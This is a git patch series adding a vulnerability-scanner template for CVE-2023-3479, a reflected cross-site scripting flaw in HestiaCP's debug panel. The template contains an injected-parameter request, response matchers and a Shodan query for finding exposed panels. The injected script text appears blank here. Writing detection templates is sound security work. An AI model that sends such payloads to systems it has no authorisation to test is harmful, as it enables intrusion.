From 6dc7cbafe6e84135f0efffe4f4a16ba644f16b52 Mon Sep 17 00:00:00 2001 From: edoardottt Date: Sun, 9 Jul 2023 11:02:02 +0200 Subject: [PATCH 1/3] add CVE-2023-3479 --- http/cves/2023/CVE-2023-3479.yaml | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 http/cves/2023/CVE-2023-3479.yaml diff --git a/http/cves/2023/CVE-2023-3479.yaml b/http/cves/2023/CVE-2023-3479.yaml new file mode 100644 index 00000000000..9b4ba51f945 --- /dev/null +++ b/http/cves/2023/CVE-2023-3479.yaml @@ -0,0 +1,31 @@ +id: CVE-2023-3479 + +info: + name: hestiacp/hestiacp prior to 1.7.8 - Cross-Site Scripting + author: edoardottt + severity: medium + description: | + Cross-site Scripting (XSS) - Reflected in GitHub repository hestiacp/hestiacp prior to 1.7.8. + reference: + - https://huntr.dev/bounties/6ac5cf87-6350-4645-8930-8f2876427723/ + - https://nvd.nist.gov/vuln/detail/CVE-2023-3479 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-3479 + cwe-id: CWE-79 + tags: cve,cve2023,hestiacp,xss + +http: + - method: GET + path: + - '{{BaseURL}}/templates/pages/debug_panel.php?id=xss">' + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(content_type, "text/html")' + - 'contains(body, "")' + - 'contains(body, "Hestia Control Panel")' + condition: and From 685850abaee5d2820a357b71bae6677b418568a7 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 10 Jul 2023 20:34:42 +0530 Subject: [PATCH 2/3] fix-matcher --- http/cves/2023/CVE-2023-3479.yaml | 25 +++++++++++++++++-------- 1 file changed, 17 insertions(+), 8 deletions(-) diff --git a/http/cves/2023/CVE-2023-3479.yaml b/http/cves/2023/CVE-2023-3479.yaml index 9b4ba51f945..a6471866497 100644 --- a/http/cves/2023/CVE-2023-3479.yaml +++ b/http/cves/2023/CVE-2023-3479.yaml @@ -1,7 +1,7 @@ id: CVE-2023-3479 info: - name: hestiacp/hestiacp prior to 1.7.8 - Cross-Site Scripting + name: Hestiacp <= 1.7.8 - Cross-Site Scripting author: edoardottt severity: medium description: | @@ -14,18 +14,27 @@ info: cvss-score: 6.1 cve-id: CVE-2023-3479 cwe-id: CWE-79 + cpe: cpe:2.3:a:hestiacp:control_panel:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + shodan-query: http.favicon.hash:-476299640 + verified: true tags: cve,cve2023,hestiacp,xss http: - method: GET path: - - '{{BaseURL}}/templates/pages/debug_panel.php?id=xss">' + - '{{BaseURL}}/templates/pages/debug_panel.php?id={{randstr}}">' + matchers-condition: and matchers: - - type: dsl - dsl: - - 'status_code == 200' - - 'contains(content_type, "text/html")' - - 'contains(body, "")' - - 'contains(body, "Hestia Control Panel")' + - type: word + part: body + words: + - 'debug-panel' + - '' condition: and + + - type: status + status: + - 200 From f942b15400e0291415958bb7b22a25f7d7a723da Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 10 Jul 2023 20:41:27 +0530 Subject: [PATCH 3/3] updated matcher --- http/cves/2023/CVE-2023-3479.yaml | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/http/cves/2023/CVE-2023-3479.yaml b/http/cves/2023/CVE-2023-3479.yaml index a6471866497..0703512cdac 100644 --- a/http/cves/2023/CVE-2023-3479.yaml +++ b/http/cves/2023/CVE-2023-3479.yaml @@ -17,8 +17,8 @@ info: cpe: cpe:2.3:a:hestiacp:control_panel:*:*:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: http.favicon.hash:-476299640 verified: true + shodan-query: http.favicon.hash:-476299640 tags: cve,cve2023,hestiacp,xss http: @@ -35,6 +35,11 @@ http: - '' condition: and + - type: word + part: header + words: + - text/html + - type: status status: - 200